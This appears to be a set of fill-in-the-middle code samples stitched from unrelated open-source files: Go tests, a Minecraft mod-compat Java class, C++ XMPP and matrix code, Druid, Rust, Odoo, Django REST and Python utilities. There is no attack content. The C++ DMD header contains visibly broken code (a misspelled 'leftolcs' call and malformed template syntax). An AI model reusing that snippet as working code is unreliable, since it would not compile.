expect{hooks.RelationDeparted, "u/4", 33},
expect{hook: hooks.RelationBroken},
), reconcileTest(
"If there's a pending changed, that must still be respected.",
msi{"u/0": 3}, "u/0",
expect{hooks.RelationChanged, "u/0", 3},
expect{hooks.RelationDeparted, "u/0", 3},
expect{hook: hooks.RelationBroken},
),
}
func (s *HookQueueSuite) TestDyingHookQueue(c *gc.C) {
for i, t := range dyingHookQueueTests {
c.Logf("test %d: %s", i, t.summary)
out := make(chan hook.Info)
q := relation.NewDyingHookQueue(t.initial, out)
for i, step := range t.steps {
c.Logf(" step %d", i)
step.check(c, nil, out)
}
expect{}.check(c, nil, out)
q.Stop()
}
}
// RUW exists entirely to send RelationUnitsChanged events to a tested
// HookQueue in a synchronous and predictable fashion.
type RUW struct {
in chan params.RelationUnitsChange
stopped bool
}
func (w *RUW) Changes() <-chan params.RelationUnitsChange {
return w.in
}
func (w *RUW) Stop() error {
close(w.in)
w.stopped = true
return nil
}
func (w *RUW) Err() error {
return nil
}
type checker interface {
check(c *gc.C, in chan params.RelationUnitsChange, out chan hook.Info)
}
type send struct {
changed msi
departed []string
}
func (d send) check(c *gc.C, in chan params.RelationUnitsChange, out chan hook.Info) {
ruc := params.RelationUnitsChange{Changed: map[string]params.UnitSettings{}}
for name, version := range d.changed {
ruc.Changed[name] = params.UnitSettings{Version: version}
}
for _, name := range d.departed {
ruc.Departed = append(ruc.Departed, name)
}
in <- ruc
}
type advance struct {
count int
}
func (d advance) check(c *gc.C, in chan params.RelationUnitsChange, out chan hook.Info) {
for i := 0; i < d.count; i++ {
select {
case <-out:
case <-time.After(coretesting.LongWait):
c.Fatalf("timed out waiting for event %d", i)
}
}
}
type expect struct {
hook hooks.Kind
unit string
version int64
}
func (d expect) check(c *gc.C, in chan params.RelationUnitsChange, out chan hook.Info) {
if d.hook == "" {
select {
case unexpected := <-out:
c.Fatalf("got %#v", unexpected)
case <-time.After(coretesting.ShortWait):
}
return
}
expect := hook.Info{
Kind: d.hook,
RelationId: 21345,
RemoteUnit: d.unit,
ChangeVersion: d.version,
}
select {
case actual := <-out:
c.Assert(actual, gc.DeepEquals, expect)
case <-time.After(coretesting.LongWait):
c.Fatalf("timed out waiting for %#v", expect)
}
}<|fim▁end|> | func fullTest(summary string, steps ...checker) hookQueueTest {
return hookQueueTest{summary, &relation.State{21345, nil, ""}, steps}
} |
<|file_name|>HighOven.java<|end_file_name|><|fim▁begin|>package com.blamejared.compat.tcomplement.highoven;
import java.util.LinkedHashMap;
import java.util.LinkedList;
import java.util.List;
import java.util.Map;
import com.blamejared.ModTweaker;
import com.blamejared.compat.mantle.RecipeMatchIIngredient;
import com.blamejared.compat.tcomplement.highoven.recipes.HeatRecipeTweaker;
import com.blamejared.compat.tcomplement.highoven.recipes.HighOvenFuelTweaker;
import com.blamejared.compat.tcomplement.highoven.recipes.MixRecipeTweaker;
import com.blamejared.compat.tconstruct.recipes.MeltingRecipeTweaker;
import com.blamejared.mtlib.helpers.InputHelper;
import com.blamejared.mtlib.helpers.LogHelper;
import com.blamejared.mtlib.utils.BaseAction;
import crafttweaker.CraftTweakerAPI;
import crafttweaker.annotations.ModOnly;
import crafttweaker.annotations.ZenRegister;
import crafttweaker.api.item.IIngredient;
import crafttweaker.api.item.IItemStack;
import crafttweaker.api.liquid.ILiquidStack;
import crafttweaker.mc1120.item.MCItemStack;
import knightminer.tcomplement.library.TCompRegistry;
import knightminer.tcomplement.library.events.TCompRegisterEvent;
import net.minecraft.item.ItemStack;
import net.minecraft.util.NonNullList;
import net.minecraftforge.common.MinecraftForge;
import net.minecraftforge.fluids.FluidStack;
import net.minecraftforge.fml.common.eventhandler.SubscribeEvent;
import stanhebben.zenscript.annotations.Optional;
import stanhebben.zenscript.annotations.ZenClass;
import stanhebben.zenscript.annotations.ZenMethod;
import stanhebben.zenscript.util.Pair;
@ZenClass("mods.tcomplement.highoven.HighOven")
@ZenRegister
@ModOnly("tcomplement")
public class HighOven {
public static final List<IIngredient> REMOVED_FUELS = new LinkedList<>();
public static final Map<ILiquidStack, IItemStack> REMOVED_OVERRIDES = new LinkedHashMap<>();
public static final List<Pair<FluidStack, FluidStack>> REMOVED_HEAT_RECIPES = new LinkedList<>();
public static final List<Pair<FluidStack, FluidStack>> REMOVED_MIX_RECIPES = new LinkedList<>();
private static boolean init = false;
private static void init() {
if (!init) {
MinecraftForge.EVENT_BUS.register(new HighOven());
init = true;
}
}
/*-------------------------------------------------------------------------*\
| High Oven Fuels |
\*-------------------------------------------------------------------------*/
@ZenMethod
public static void removeFuel(IIngredient stack) {
init();
CraftTweakerAPI.apply(new HighOven.RemoveFuel(stack));
}
@ZenMethod
public static void addFuel(IIngredient fuel, int burnTime, int tempRate) {
init();
ModTweaker.LATE_ADDITIONS.add(new HighOven.AddFuel(fuel, burnTime, tempRate));
}
private static class AddFuel extends BaseAction {
private IIngredient fuel;
private int time;
private int rate;
public AddFuel(IIngredient fuel, int time, int rate) {
super("High Oven fuel");
this.fuel = fuel;
this.time = time;
this.rate = rate;
}
@Override
public void apply() {
TCompRegistry.registerFuel(new HighOvenFuelTweaker(new RecipeMatchIIngredient(fuel), time, rate));
}
@Override
public String describe() {
return String.format("Adding %s as %s", this.getRecipeInfo(), this.name);
}
@Override
public String getRecipeInfo() {
return LogHelper.getStackDescription(fuel);
}
}
private static class RemoveFuel extends BaseAction {
private IIngredient fuel;
public RemoveFuel(IIngredient fuel) {
super("High Oven fuel");
this.fuel = fuel;
};
@Override
public void apply() {
REMOVED_FUELS.add(fuel);
}
@Override
public String describe() {
return String.format("Removing %s as %s", this.getRecipeInfo(), this.name);
}
@Override
public String getRecipeInfo() {
return LogHelper.getStackDescription(fuel);
}
}
/*-------------------------------------------------------------------------*\
| High Oven Melting |
\*-------------------------------------------------------------------------*/
@ZenMethod
public static void addMeltingOverride(ILiquidStack output, IIngredient input, @Optional int temp) {
init();
ModTweaker.LATE_ADDITIONS
.add(new HighOven.AddMelting(InputHelper.toFluid(output), input, (temp == 0 ? -1 : temp)));
}
@ZenMethod
public static void removeMeltingOverride(ILiquidStack output, @Optional IItemStack input) {
init();
CraftTweakerAPI.apply(new HighOven.RemoveMelting(output, input));
}
private static class AddMelting extends BaseAction {
private IIngredient input;
private FluidStack output;
private int temp;
public AddMelting(FluidStack output, IIngredient input, int temp) {
super("High Oven melting override");
this.input = input;
this.output = output;
this.temp = temp;
}
@Override
public void apply() {
if (temp > 0) {
TCompRegistry.registerHighOvenOverride(
new MeltingRecipeTweaker(new RecipeMatchIIngredient(input, output.amount), output, temp));
} else {
TCompRegistry.registerHighOvenOverride(
new MeltingRecipeTweaker(new RecipeMatchIIngredient(input, output.amount), output));
}
}
@Override
public String describe() {
return String.format("Adding %s for %s", this.name, this.getRecipeInfo());
}
@Override
protected String getRecipeInfo() {
return LogHelper.getStackDescription(input) + ", now yields " + LogHelper.getStackDescription(output);
}
}
private static class RemoveMelting extends BaseAction {
private ILiquidStack output;
private IItemStack input;
public RemoveMelting(ILiquidStack output, IItemStack input) {
super("High Oven melting override");
this.input = input;
this.output = output;
}
@Override
public void apply() {
REMOVED_OVERRIDES.put(output, input);
}
@Override
public String describe() {
return String.format("Removing %s Recipe(s) for %s", this.name, this.getRecipeInfo());
}
@Override
protected String getRecipeInfo() {
return LogHelper.getStackDescription(output);
}
}
/*-------------------------------------------------------------------------*\
| High Oven Heat |
\*-------------------------------------------------------------------------*/
@ZenMethod
public static void removeHeatRecipe(ILiquidStack output, @Optional ILiquidStack input) {
init();
CraftTweakerAPI.apply(new RemoveHeat(input, output));
}
@ZenMethod
public static void addHeatRecipe(ILiquidStack output, ILiquidStack input, int temp) {
init();
ModTweaker.LATE_ADDITIONS
.add(new HighOven.AddHeat(InputHelper.toFluid(output), InputHelper.toFluid(input), temp));
}
private static class AddHeat extends BaseAction {
private FluidStack output, input;
private int temp;
public AddHeat(FluidStack output, FluidStack input, int temp) {
super("High Oven Heat");
this.output = output;
this.input = input;
this.temp = temp;
}
@Override
public void apply() {
TCompRegistry.registerHeatRecipe(new HeatRecipeTweaker(input, output, temp));
}
@Override
public String describe() {
return String.format("Adding %s Recipe for %s", this.name, this.getRecipeInfo());
}
@Override
protected String getRecipeInfo() {
return LogHelper.getStackDescription(output);
}
}
private static class RemoveHeat extends BaseAction {
private ILiquidStack input;
private ILiquidStack output;
public RemoveHeat(ILiquidStack input, ILiquidStack output) {
super("High Oven Heat");
this.input = input;
this.output = output;
}
@Override
public void apply() {
REMOVED_HEAT_RECIPES.add(new Pair<>(InputHelper.toFluid(input), InputHelper.toFluid(output)));
}
@Override
public String describe() {
return String.format("Removing %s Recipe(s) for %s", this.name, this.getRecipeInfo());
}
@Override
public String getRecipeInfo() {
return LogHelper.getStackDescription(output)
+ ((input == null) ? "" : (" from " + LogHelper.getStackDescription(input)));
}
}
/*-------------------------------------------------------------------------*\
| High Oven Mix |
\*-------------------------------------------------------------------------*/
@ZenMethod
public static void removeMixRecipe(ILiquidStack output, @Optional ILiquidStack input) {
init();
CraftTweakerAPI.apply(new RemoveMix(output, input));
}
@ZenMethod
public static MixRecipeBuilder newMixRecipe(ILiquidStack output, ILiquidStack input, int temp) {
init();
return new MixRecipeBuilder(output, input, temp);
}
@ZenMethod
public static MixRecipeManager manageMixRecipe(ILiquidStack output, ILiquidStack input) {
init();
return new MixRecipeManager(output, input);
}
private static class RemoveMix extends BaseAction {
private ILiquidStack output;
private ILiquidStack input;
public RemoveMix(ILiquidStack output, ILiquidStack input) {
super("High Oven Mix");
this.output = output;
this.input = input;
}
@Override
public void apply() {
REMOVED_MIX_RECIPES.add(new Pair<>(InputHelper.toFluid(input), InputHelper.toFluid(output)));
}
@Override
public String describe() {
return String.format("Removing %s Recipe(s) for %s", this.name, this.getRecipeInfo());
}
@Override
protected String getRecipeInfo() {
return LogHelper.getStackDescription(output)
+ ((input == null) ? "" : (" from " + LogHelper.getStackDescription(input)));
}
}
/*-------------------------------------------------------------------------*\
| Event handlers |
\*-------------------------------------------------------------------------*/
@SubscribeEvent
public void onHighOvenFuelRegister(TCompRegisterEvent.HighOvenFuelRegisterEvent event) {
if (event.getRecipe() instanceof HighOvenFuelTweaker) {
return;
}
for (IIngredient entry : REMOVED_FUELS) {
for (ItemStack fuel : event.getRecipe().getFuels()) {
if (entry.matches(new MCItemStack(fuel))) {
event.setCanceled(true);
return;
}
}
}
}
@SubscribeEvent
public void onHighOvenHeatRegister(TCompRegisterEvent.HighOvenHeatRegisterEvent event) {
if (event.getRecipe() instanceof HeatRecipeTweaker) {
return;
} else {
for (Pair<FluidStack, FluidStack> entry : REMOVED_HEAT_RECIPES) {
if (event.getRecipe().matches(entry.getKey(), entry.getValue())) {
event.setCanceled(true);
return;
}
}
}
}
@SubscribeEvent
public void onHighOvenMixRegister(TCompRegisterEvent.HighOvenMixRegisterEvent event) {
if (event.getRecipe() instanceof MixRecipeTweaker) {
return;
} else {
for (Pair<FluidStack, FluidStack> entry : REMOVED_MIX_RECIPES) {
if (event.getRecipe().matches(entry.getKey(), entry.getValue())) {
event.setCanceled(true);
return;
}
}<|fim▁hole|> public void onHighOvenOverrideRegister(TCompRegisterEvent.HighOvenOverrideRegisterEvent event) {
if (event.getRecipe() instanceof MeltingRecipeTweaker) {
return;
}
for (Map.Entry<ILiquidStack, IItemStack> entry : REMOVED_OVERRIDES.entrySet()) {
if (event.getRecipe().getResult().isFluidEqual(((FluidStack) entry.getKey().getInternal()))) {
if (entry.getValue() != null) {
if (event.getRecipe().input
.matches(NonNullList.withSize(1, (ItemStack) entry.getValue().getInternal())).isPresent()) {
event.setCanceled(true);
}
} else
event.setCanceled(true);
}
}
}
}<|fim▁end|> | }
}
@SubscribeEvent |
<|file_name|>QXmppVCardManager.cpp<|end_file_name|><|fim▁begin|>/*
* Copyright (C) 2008-2014 The QXmpp developers
*
* Author:
* Manjeet Dahiya
*
* Source:
* https://github.com/qxmpp-project/qxmpp
*
* This file is a part of QXmpp library.
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
*/
#include "QXmppClient.h"
#include "QXmppConstants.h"
#include "QXmppUtils.h"
#include "QXmppVCardIq.h"
#include "QXmppVCardManager.h"
class QXmppVCardManagerPrivate
{
public:
QXmppVCardIq clientVCard;
bool isClientVCardReceived;
};
QXmppVCardManager::QXmppVCardManager()
: d(new QXmppVCardManagerPrivate)
{
d->isClientVCardReceived = false;
}
QXmppVCardManager::~QXmppVCardManager()
{
delete d;
}
/// This function requests the server for vCard of the specified jid.
/// Once received the signal vCardReceived() is emitted.
///
/// \param jid Jid of the specific entry in the roster
///
QString QXmppVCardManager::requestVCard(const QString& jid)
{
QXmppVCardIq request(jid);
if(client()->sendPacket(request))
return request.id();
else
return QString();
}
/// Returns the vCard of the connected client.
///
/// \return QXmppVCard
///
const QXmppVCardIq& QXmppVCardManager::clientVCard() const
{
return d->clientVCard;
}
/// Sets the vCard of the connected client.
///
/// \param clientVCard QXmppVCard
///
void QXmppVCardManager::setClientVCard(const QXmppVCardIq& clientVCard)
{
d->clientVCard = clientVCard;
d->clientVCard.setTo("");
d->clientVCard.setFrom("");
d->clientVCard.setType(QXmppIq::Set);
client()->sendPacket(d->clientVCard);
}
/// This function requests the server for vCard of the connected user itself.
/// Once received the signal clientVCardReceived() is emitted. Received vCard
/// can be get using clientVCard().
QString QXmppVCardManager::requestClientVCard()
{
return requestVCard();
}
/// Returns true if vCard of the connected client has been
/// received else false.
///
/// \return bool
///
bool QXmppVCardManager::isClientVCardReceived() const
{
return d->isClientVCardReceived;
}
/// \cond
QStringList QXmppVCardManager::discoveryFeatures() const
{
// XEP-0054: vcard-temp<|fim▁hole|>bool QXmppVCardManager::handleStanza(const QDomElement &element)
{
if(element.tagName() == "iq" && QXmppVCardIq::isVCard(element))
{
QXmppVCardIq vCardIq;
vCardIq.parse(element);
if (vCardIq.from().isEmpty()) {
d->clientVCard = vCardIq;
d->isClientVCardReceived = true;
emit clientVCardReceived();
}
emit vCardReceived(vCardIq);
return true;
}
return false;
}
/// \endcond<|fim▁end|> | return QStringList() << ns_vcard;
}
|
<|file_name|>LikeOperatorConversion.java<|end_file_name|><|fim▁begin|>/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.druid.sql.calcite.expression.builtin;
import org.apache.calcite.rex.RexCall;
import org.apache.calcite.rex.RexLiteral;<|fim▁hole|>import org.apache.calcite.sql.fun.SqlStdOperatorTable;
import org.apache.druid.query.filter.DimFilter;
import org.apache.druid.query.filter.LikeDimFilter;
import org.apache.druid.segment.VirtualColumn;
import org.apache.druid.segment.column.RowSignature;
import org.apache.druid.sql.calcite.expression.DirectOperatorConversion;
import org.apache.druid.sql.calcite.expression.DruidExpression;
import org.apache.druid.sql.calcite.expression.Expressions;
import org.apache.druid.sql.calcite.planner.PlannerContext;
import org.apache.druid.sql.calcite.rel.VirtualColumnRegistry;
import javax.annotation.Nullable;
import java.util.List;
public class LikeOperatorConversion extends DirectOperatorConversion
{
private static final SqlOperator SQL_FUNCTION = SqlStdOperatorTable.LIKE;
public LikeOperatorConversion()
{
super(SQL_FUNCTION, "like");
}
@Override
public SqlOperator calciteOperator()
{
return SQL_FUNCTION;
}
@Nullable
@Override
public DimFilter toDruidFilter(
PlannerContext plannerContext,
RowSignature rowSignature,
@Nullable VirtualColumnRegistry virtualColumnRegistry,
RexNode rexNode
)
{
final List<RexNode> operands = ((RexCall) rexNode).getOperands();
final DruidExpression druidExpression = Expressions.toDruidExpression(
plannerContext,
rowSignature,
operands.get(0)
);
if (druidExpression == null) {
return null;
}
if (druidExpression.isSimpleExtraction()) {
return new LikeDimFilter(
druidExpression.getSimpleExtraction().getColumn(),
RexLiteral.stringValue(operands.get(1)),
operands.size() > 2 ? RexLiteral.stringValue(operands.get(2)) : null,
druidExpression.getSimpleExtraction().getExtractionFn()
);
} else if (virtualColumnRegistry != null) {
VirtualColumn v = virtualColumnRegistry.getOrCreateVirtualColumnForExpression(
plannerContext,
druidExpression,
operands.get(0).getType().getSqlTypeName()
);
return new LikeDimFilter(
v.getOutputName(),
RexLiteral.stringValue(operands.get(1)),
operands.size() > 2 ? RexLiteral.stringValue(operands.get(2)) : null,
null
);
} else {
return null;
}
}
}<|fim▁end|> | import org.apache.calcite.rex.RexNode;
import org.apache.calcite.sql.SqlOperator; |
<|file_name|>dmd.hpp<|end_file_name|><|fim▁begin|>/*
Copyright (c) 2014, Sam Schetterer, Nathan Kutz, University of Washington
Authors: Sam Schetterer
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#ifndef DMD_HPP
#define DMD_HPP
#include "defs.hpp"
#include <eigen3/Eigen/Core>
#include <eigen3/Eigen/Dense>
#include <eigen3/Eigen/SVD>
template<class T, class mat>
struct eigenval_type{
typedef Eigen::EigenSolver<mat> solver;
};
template<class T, class mat>
struct eigenval_type<std::complex<T>, mat>{
typedef Eigen::ComplexEigenSolver<mat> solver;
};
template<class T, int storage>
using dmat = Eigen::Matrix<T, Dynamic, Dynamic, storage>;
template<class T>
using dvec = Eigen::Matrix<T, Eigen::Dynamic, 1>;
//if invals is in R(n*m+1)
template<class T, int storage, int storage_out1, int storage_out2>
inline void _dmd_(const dmat<T, storage>& invals,
dmat<T, storage_out1>& evecs, dvec<T>& evals, dmat<T, storage_out2>* pod_ptr,
double energy){
//from Tu, theory and application of DMD, we can use the thin models
//(rank of input determines SVD dimensions
Eigen::JacobiSVD<dmat<T, storage>>
svd(invals.rightCols(invals.cols()-1),Eigen::ComputeThinU | Eigen::ComputeThinV);
//trunctuate the svd after a certain energy point
const auto& sing_vals = svd.singularValues();
double ener =sing_vals.squaredNorm();
decltype(svd.nonzeroSingularValues()) num_keep=0;
double ener_cum_sum=0;
while(ener_cum_sum < ener){
ener_cum_sum += sing_vals[num_keep]*sing_vals[num_keep];
num_keep++;
if(num_keep >= svd.nonzeroSingularValues()){
break;
}
}
dmat<T, storage> S(num_keep, num_keep);
//calculate the dmd
S.noalias() = svd.matrixU().leftCols(num_keep).adjoint()*
invals.leftCols(invals.cols()-1)*svd.matrixV().leftCols(num_keep) *
(1.0/svd.singularValues().head(num_keep).array()).matrix().asDiagonal();
//calculate eigenvalues/eigenvectors
eigenval_type<T, dmat<T, storage>::solver esolver(S);
if(esolver.info() != Eigen::Success){
err("Eigenvalues failed to compute", "dmd",
"utils/dmd.hpp", FATAL_ERROR);
}
//calculate the modes from POD and eigenvectors
evecs.noalias() = svd.matrixU().leftolcs(num_keep)*esolver.eigenvectors();
evals = esolver.eigenvalues();
if(pod_ptr){
*(pod_ptr) = svd.matrixU().leftCols(num_keep);
}
}
template<class T, int storage, int storage_out1>
inline void dmd(const dmat<T, storage>& invals,
dmat<T, storage_out1>& evecs, dvec<T>& evals, double energy){
_dmd_(invals, evecs, evals, 0, energy);
}
template<class T, int storage, int storage_out1, int storage_out2>
inline void dmd(const dmat<T, storage>& invals,
dmat<T, storage_out1>& evecs, dvec<T>& evals, dmat<T, storage_out2>& pod_dat,
double energy){
_dmd_(invals, evecs, evals, &pod_dat, energy);<|fim▁hole|>inline matrix pod(const matrix& invals, double energy=1){
Eigen::JacobiSVD<matrix>
svd(invals.rightCols(invals.cols()-1),Eigen::ComputeThinU);
//from Tu, theory and application of DMD, we can use the thin models
//(rank of input determines SVD dimensions
const auto& sing_vals = svd.singularValues();
double ener =sing_vals.squaredNorm();
decltype(sing_vals.nonzeroSingularValues()) num_keep=0;
double ener_cum_sum=0;
while(ener_cum_sum < ener){
ener_cum_sum += sing_vals[num_keep]*sing_vals[num_keep];
num_keep++;
if(num_keep >= sing_vals.nonzeroSingularValues()){
break;
}
}
return svd.matrixU().leftCols(num_keep);
}
#endif<|fim▁end|> | }
template<class matrix> |
<|file_name|>call_chain.rs<|end_file_name|><|fim▁begin|>// CITA
// Copyright 2016-2017 Cryptape Technologies LLC.
// This program is free software: you can redistribute it
// and/or modify it under the terms of the GNU General Public
// License as published by the Free Software Foundation,
// either version 3 of the License, or (at your option) any
// later version.
// This program is distributed in the hope that it will be
// useful, but WITHOUT ANY WARRANTY; without even the implied
// warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
// PURPOSE. See the GNU General Public License for more details.
// You should have received a copy of the GNU General Public License
// along with this program. If not, see <http://www.gnu.org/licenses/>.
use common_types::receipt::LocalizedReceipt;
use core::libchain::Genesis;
use core::libchain::chain::*;
use std::sync::Arc;
use std::sync::mpsc::Sender;<|fim▁hole|>#[allow(unused_variables, dead_code)]
#[derive(Clone)]
pub struct Callchain {
chain: Arc<Chain>,
}
#[allow(unused_variables, dead_code)]
impl Callchain {
pub fn new(db: Arc<KeyValueDB>, genesis: Genesis, sync_sender: Sender<u64>) -> Self {
let (chain, st) = Chain::init_chain(db, genesis, sync_sender);
Callchain { chain: chain }
}
pub fn add_block(&self, block: Block) {
self.chain.set_block(block);
}
pub fn get_height(&self) -> u64 {
self.chain.get_current_height()
}
pub fn get_pre_hash(&self) -> H256 {
*self.chain.current_hash.read()
}
pub fn get_contract_address(&self, hash: H256) -> H160 {
let receipt = self.chain.localized_receipt(hash).unwrap();
match receipt.contract_address {
Some(contract_address) => contract_address,
None => panic!("contract_address error"),
}
}
pub fn get_receipt(&self, hash: H256) -> LocalizedReceipt {
self.chain.localized_receipt(hash).unwrap()
}
}<|fim▁end|> | use util::{H256, H160};
use util::KeyValueDB;
|
<|file_name|>test_prototype_module_export.py<|end_file_name|><|fim▁begin|># #############################################################################
#
# OpenERP, Open Source Management Solution
# This module copyright (C) 2010 - 2014 Savoir-faire Linux
# (<http://www.savoirfairelinux.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#<|fim▁hole|>from odoo.tests import common
class TestPrototypeModuleExport(common.TransactionCase):
def setUp(self):
super(TestPrototypeModuleExport, self).setUp()
self.main_model = self.env["module_prototyper.module.export"]
self.prototype_model = self.env["module_prototyper"]
self.module_category_model = self.env["ir.module.category"]
self.prototype = self.prototype_model.create(
{
"name": "t_name",
"category_id": self.module_category_model.browse(1).id,
"human_name": "t_human_name",
"summary": "t_summary",
"description": "t_description",
"author": "t_author",
"maintainer": "t_maintainer",
"website": "t_website",
}
)
self.exporter = self.main_model.create({"name": "t_name"})
def test_action_export_assert_for_wrong_active_model(self):
"""Test if the assertion raises."""
exporter = self.main_model.with_context(active_model="t_active_model").create(
{}
)
self.assertRaises(AssertionError, exporter.action_export)
def test_action_export_update_wizard(self):
"""Test if the wizard is updated during the process."""
exporter = self.main_model.with_context(
active_model=self.prototype_model._name,
active_id=self.prototype.id,
).create({})
exporter.action_export()
self.assertEqual(exporter.state, "get")
self.assertEqual(exporter.name, "{}.zip".format(self.prototype.name))
def test_zip_files_returns_tuple(self):
"""Test the method return of the method that generate the zip file."""
ret = self.main_model.zip_files(self.exporter, [self.prototype])
self.assertIsInstance(ret, tuple)
self.assertIsInstance(ret.zip_file, zipfile.ZipFile)
self.assertIsInstance(ret.BytesIO, io.BytesIO)<|fim▁end|> | ##############################################################################
import io
import zipfile
|
<|file_name|>test_clientmanager.py<|end_file_name|><|fim▁begin|># Copyright 2012-2013 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from openstackclient.common import clientmanager
from openstackclient.tests import utils
class Container(object):
attr = clientmanager.ClientCache(lambda x: object())
def __init__(self):
pass
class TestClientManager(utils.TestCase):
def setUp(self):
super(TestClientManager, self).setUp()<|fim▁hole|> # NOTE(dtroyer): Verify that the ClientCache descriptor only invokes
# the factory one time and always returns the same value after that.
c = Container()
self.assertEqual(c.attr, c.attr)<|fim▁end|> |
def test_singleton(self): |
<|file_name|>SessionDocumentModel.js<|end_file_name|><|fim▁begin|>import {observable} from 'mobx';
export default class SessionDocumentModel {
@observable id;
@observable sessionID;
@observable studentID;
@observable filename;<|fim▁hole|> @observable CreatorId;
@observable archived;
constructor(value) {
this.id = id;
this.sessionID = sessionID;
this.studentID = studentID;
this.filename = filename;
this.CreatorId = CreatorId;
this.archived = archived;
}
}<|fim▁end|> | |
<|file_name|>ccScmStatus.ts<|end_file_name|><|fim▁begin|><|fim▁hole|>export const enum ccScmStatus {
MODIFIED = 1,
UNTRACKED = 2
}<|fim▁end|> | |
<|file_name|>permissions.py<|end_file_name|><|fim▁begin|>from rest_framework.permissions import BasePermission, SAFE_METHODS
class IsOwnerOrReadOnly(BasePermission):
"""<|fim▁hole|>
"""
def has_object_permission(self, request, view, obj):
return request.method in SAFE_METHODS or view.get_stream().owner == request.user<|fim▁end|> | Check if request is safe or authenticated user is owner. |
<|file_name|>ftl_util.py<|end_file_name|><|fim▁begin|># Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This package defines helpful utilities for FTL ."""
import os
import time
import logging
import subprocess
import tempfile
import datetime
import json
from ftl.common import constants
from ftl.common import ftl_error
from containerregistry.client.v2_2 import append
from containerregistry.transform.v2_2 import metadata
class FTLException(Exception):
pass
def AppendLayersIntoImage(imgs):
with Timing('Stitching layers into final image'):
for i, img in enumerate(imgs):
if i == 0:
result_image = img
continue
diff_ids = img.diff_ids()
for diff_id in diff_ids:
lyr = img.blob(img._diff_id_to_digest(diff_id))
overrides = CfgDctToOverrides(json.loads(img.config_file()))
result_image = append.Layer(
result_image, lyr, diff_id=diff_id, overrides=overrides)
return result_image
# This is a 'whitelist' of values to pass from the
# config_file of a DockerImage to an Overrides object
# _OVERRIDES_VALUES = ['created', 'Entrypoint', 'Env']
def CfgDctToOverrides(config_dct):
"""
Takes a dct of config values and runs them through
the whitelist
"""
overrides_dct = {}
for k, v in config_dct.iteritems():
if k == 'created':
# this key change is made as the key is
# 'creation_time' in an Overrides object
# but 'created' in the config_file
overrides_dct['creation_time'] = v
for k, v in config_dct['config'].iteritems():
if k == 'Entrypoint':
# this key change is made as the key is
# 'entrypoint' in an Overrides object
# but 'Entrypoint' in the config_file
overrides_dct['entrypoint'] = v
elif k == 'Env':
# this key change is made as the key is
# 'env' in an Overrides object
# but 'Env' in the config_file
overrides_dct['env'] = v
elif k == 'ExposedPorts':
# this key change is made as the key is
# 'ports' in an Overrides object
# but 'ExposedPorts' in the config_file
overrides_dct['ports'] = v
return metadata.Overrides(**overrides_dct)
class Timing(object):
def __init__(self, descriptor):
logging.info("starting: %s" % descriptor)
self.descriptor = descriptor
def __enter__(self):
self.start = time.time()
return self
def __exit__(self, unused_type, unused_value, unused_traceback):
end = time.time()
logging.info('%s took %d seconds', self.descriptor, end - self.start)
def zip_dir_to_layer_sha(pkg_dir):
